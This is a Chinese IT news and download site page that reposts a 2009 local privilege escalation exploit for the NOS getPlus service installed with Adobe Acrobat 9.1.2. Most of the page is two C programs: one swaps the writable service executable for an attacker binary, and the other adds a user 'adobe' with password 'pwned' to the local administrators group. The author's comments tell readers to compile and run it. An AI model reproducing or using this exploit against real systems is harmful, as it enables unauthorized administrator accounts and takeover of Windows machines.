IT资讯/综合软件下载站!┆ 最新软件 最新文章 最新手机 UFO外星人 网站分类

您当前的位置→图文中心新闻资讯安全播报Adobe Acrobat 9.1.2 NOS 本地提权漏洞

Adobe Acrobat 9.1.2 NOS 本地提权漏洞


2009/7/26 1:04:53 编辑:佚名 来源:本站整理 
今天给大家分享Adobe Acrobat 9.1.2 NOS 本地提权漏洞安全播报文章。喜欢Adobe Acrobat 9.1.2 NOS 本地提权漏洞的可以分享Adobe Acrobat 9.1.2 NOS 本地提权漏洞给你的好友。

Adobe Acrobat 9.1.2 NOS 本地提权漏洞
/*
alwaysdirtyneverclean.c
AKA
Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip)
BY
Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009
**************************** ******************************
I've been up for nearly 24 hours (only the last few doing research though). This exploit is based on the
brief information provided by Nine:Situations:Group http://www.milw0rm.com/exploits/9199). Exploiting
improper permissions is fun. A few notes are in order though. The getPlus service (that I tested, via 9.1.2)
isn't installed as an "Automatic" service, therefore making it slightly harder (but not hard) to practically
use to your advantage. But I tested running this code under a GUEST account and it worked pretty good (just
the first time though). Change the values as needed, compile and run. Things could be more or less silent,
lethal or non-lethal... it is completely up to you. Things cannot get much simpler than this :)

Tested on Windows XP SP3 + Adobe Acrobat 9.1.2 (installed from adobe's download manager, then updated)

But maybe give Adobe a break? 2009 has been a rough year for them already, heh. Sleep time.
 
alwaysdirtyneverclean.c
*/

#include <stdio.h>
#include <windows.h>

#define DEFAULT_TARGET  "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe"
#define DEFAULT_BACKUP  "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe.bak"
#define DEFAULT_EXECUTE "C:\\Documents and Settings\\All Users\\Documents\\bin.exe"
//#define DEFAULT_EXECUTE "C:\\WINDOWS\\system32\\calc.exe"

int main(int argc, char *argv[])
{

     MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);
     CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);
     // shakee and bakeee

     return 0;

}
///////////////////////////////////// cut /////////////////////////////////////

/*
bin.c
FROM
Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip)
BY
Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009
*/

#include <stdio.h>
#include <windows.h>

#define CMD "C:\\WINDOWS\\system32\\cmd.exe"
#define ONE "/C net user adobe pwned /add"
#define TWO "/C net localgroup administrators adobe /add"

int main(int argc, char *argv[])
{

STARTUPINFO si = {sizeof(STARTUPINFO)};
PROCESS_INFORMATION pi;

     CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
     CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
     // mmmmmmmmmmm.. chocolate browie ice cream smoothes are goooood

     return 0;

}

12下一页

喜欢安全播报这篇文章的网友不妨去看看下面的文章:
  • Adobe Flash Player For IE是什么→去看看
  • adobe reader把PDF转换成word教程→去看看
  • Adobe Reader必学技巧之自动阅读工具→去看看
  • 相关文章
  • 教你将CAD的dwg格式批量转成JPG图片格式?
  • 雷蛇游戏本 THX 版 Blade Pro 评测VS灵刃游戏本
  • ipad 输入法中有日语切换吗
  • iPad如何充值?ipad付费购买方法
  • 10.5寸iPad Pro首发评测:黄金尺寸的生产力工具
  • 新 iPad 先行,iPhone 内存将进入 4GB 时代
  • 10.5英寸和12.9英寸iPad Pro渲染图欣赏
  • 《最游记 RELOAD BLAST》PV第二弹公开,7月放送!
  • 发表评论
    栏目列表
    阅读排行
    网站帮助 - 广告合作 - 下载声明 - 网站地图